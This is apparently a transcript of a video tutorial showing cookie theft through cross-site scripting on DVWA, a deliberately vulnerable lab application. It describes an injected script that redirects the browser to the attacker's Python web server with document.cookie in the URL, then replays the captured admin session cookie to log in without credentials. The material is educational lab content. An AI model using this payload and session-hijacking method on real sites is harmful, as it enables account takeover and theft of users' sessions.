So guys, now we are going to steal some cookies from the user using this XSS vulnerability. Let's go this DVWA and let me log in into this admin and password. Okay, so now I logged in. Let's see the alert. Let me write the sample JavaScript to get the alert, to make sure that we are getting there is access. So alert of high. So let me copy this and paste it in here. So let me change the security to low. So actually I want to demonstrate the this cookie stealing, so that's why we put the security low. And if you have bypassed these filters, you can apply this method, and you can see there is a JavaScript executed. There is a alert box saying hi. Okay, now what I'm going to do is I want to print out this document.cookie. So this is a document object. We can access this current cookie with document.cookie. So if I say like this, now my cookie will be displayed. So it says security is equal to low, PHP SSID is this one, C75E. Okay, now how can we send to our attacker machine? So for that we need to set up a server. You no need to install Apache or some other advanced softwares for this. You can use this Python 3, and there is a module called http.server. You can simply set up a web server on the port, say 1234. So now we are serving this HTTP on the port all interfaces 1234. So if I go and check my IP address, I have this one. So we can send the request we can post these requests to this IP address, and we get the result here. So let me show you this one. So in script tag I will say type is equals to text.javascript. So we have seen this type text or CSS, text or HTML in the HTML basics videos. I can say JavaScript. So now inside this can be considered as a text or JavaScript. Now what I can do is I want to delete this one. I want to say document dot document dot location is equals to http :/ and now I need to put the IP address of this Kali Linux machine, which is 192.0.104:1234, because my web server is running on this port 1234. So let me make sure my IP address and port are the okay. So 1234 and the IP address is 104. Okay, that's fine. And now what we want to say is we put the question mark slash and then question mark. Let's say variable name is cookies is equals to plus we need to include this document.cookie. Put the semicolon at the end. So what I am doing is I am changing the whole document's location to this IP address, and what I am going to do is I am sending a parameter and the value in that parameter cookies is the name of this parameter, and the value is document.cookie. So I am just sending this document cookie in a parameter just like username and the password. So let me copy this and run this, paste. So if I click on submit, we can see here we got the get request get slash cookies is equals to we got everything. So what we have sent is cookies is equals to this whole cookie we have seen in the previous script, that is alert of document.cookie. So we can see security is equal to this session ID is called this one. This is the whole cookies we got in this. So this is the basic way you get the cookies using this Python server. But there is a good way to get these cookies by using some Python Flask or Django, or you can also, if you know PHP, you can just write the simple PHP code. So this is, I don't know PHP that much, I know Python Django, but I will try to cover Django in the Python section, but it's not necessary, 100% necessary, but we can use for comfortable purpose. So you can also set up the HTTP server like this Python 3 -m. This is a simple and a neat way. This we get the cookies here. Now I can copy these cookies and paste it in my another browser, and I will get the login. So let me try this. So let me go to my Chrome here, 192. So DVWA. So there is already, I have installed this extension that is called cookie editor. I can just say, I can just paste it in here. So I need to remove this, all of this, and I want to click this green tick icon. So my cookies have been set. Now if I refresh this page, I see nothing. Let me see cookies. Okay, now I want to moving into this directory. So what directory we have previously? Vulnerabilities. So let me move on to this vulnerabilities, and let's see if we can log in without username and the password. Okay, let me click on this. And there you can see we have logged in as username admin, security level and PHP ID disabled. Why we have logged in as admin means we have stolen the cookie of the admin user, because you can see this is the admin and we have logged in as that user, because we have just pasted the cookie in here and we have successfully navigated into these vulnerabilities, and without logging in with username and the password, we have directly got the session of this admin. So I think you have understood. So you can just spin up a web server using the Python, and then you can just send the document dot cookie using this window document dot location, and then you need to type the tester JavaScript for make sure that this is either interpreted as tester document, tester JavaScript. So this is the basic way to steal the cookies. I hope you have understood. So that's all for this video of stealing cookies using XSS. You can see this XSS is very dangerous. If you trick the user using this script, even you can obviously you can get the cookie of that user you are going to trick to, and you can just impersonate as that user. So this XSS is very dangerous attack. You can just get the session of that user.